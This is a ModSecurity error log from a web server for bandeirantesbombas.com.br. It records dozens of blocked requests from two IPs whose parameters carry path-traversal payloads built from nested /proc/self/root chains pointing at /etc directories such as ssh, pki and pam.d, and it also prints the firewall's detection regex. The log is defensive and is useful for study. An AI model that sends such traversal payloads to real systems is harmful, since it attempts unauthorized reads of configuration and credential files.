[Mon Mar 16 08:15:38.232460 2026] [:error] [pid 21805:tid 140411590858496] [client 74.7.241.46:53222] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmWrABkC4fWIHEf8HPdgAAAFI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 08:15:40.466544 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.241.46:53228] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmXHbQATo66fKoS7wuPQAAANI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 08:15:41.756117 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.241.46:53242] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmXbysWC90G-1nBrAqEQAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:15:45.641241 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:53252] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmYbysWC90G-1nBrAqFAAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:15:46.964746 2026] [:error] [pid 11972:tid 140411632822016] [client 74.7.241.46:53254] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmYpqj1wV0Si-OkefNGwAAAA0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:15:54.720241 2026] [:error] [pid 11972:tid 140411557287680] [client 74.7.241.46:36500] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmapqj1wV0Si-OkefNJAAAABY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:15:56.046988 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.241.46:36512] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmbNSswJuvopo3lOhE0wAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:15:57.576459 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.241.46:36518] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmbf9ocpUE4ed4uDzSlwAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:15:58.806989 2026] [:error] [pid 10831:tid 140411599251200] [client 74.7.241.46:48360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmbo6lpbStxTqkSktReAAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:00.063997 2026] [:error] [pid 10831:tid 140411649607424] [client 74.7.241.46:48372] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmcI6lpbStxTqkSktReQAAAks"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:01.364223 2026] [:error] [pid 10831:tid 140411691570944] [client 74.7.241.46:48376] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmcY6lpbStxTqkSktRegAAAkY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:02.715179 2026] [:error] [pid 21533:tid 140411616036608] [client 74.7.241.46:48390] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmcnjZBu2q05ozVU85MQAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:03.982885 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.241.46:48402] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmc7ysWC90G-1nBrAqFQAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:06.159659 2026] [:error] [pid 32654:tid 140411699963648] [client 74.7.241.46:48406] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmdglT9VtDQc7bgUyLywAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:10.889165 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.241.46:48412] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmev9ocpUE4ed4uDzSnAAAAgI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:12.206592 2026] [:error] [pid 21805:tid 140411708356352] [client 74.7.241.46:34944] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmfLABkC4fWIHEf8HPmwAAAEQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:15.813836 2026] [:error] [pid 32654:tid 140411649607424] [client 74.7.241.46:34954] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmfwlT9VtDQc7bgUyLzgAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:17.155240 2026] [:error] [pid 10709:tid 140411616036608] [client 74.7.241.46:34958] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmgRXjF1vJNtV6CWrerQAAAc8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:18.271280 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.243.203:53620] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmgrABkC4fWIHEf8HPoQAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:18.583006 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.241.46:54082] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmgrABkC4fWIHEf8HPogAAAEY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:19.776166 2026] [:error] [pid 11972:tid 140411574073088] [client 74.7.241.46:54092] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmg5qj1wV0Si-OkefNKAAAABQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 08:16:21.133892 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.241.46:54106] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmhf9ocpUE4ed4uDzSnQAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 08:16:22.207585 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.243.203:36610] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfmhpqj1wV0Si-OkefNKwAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
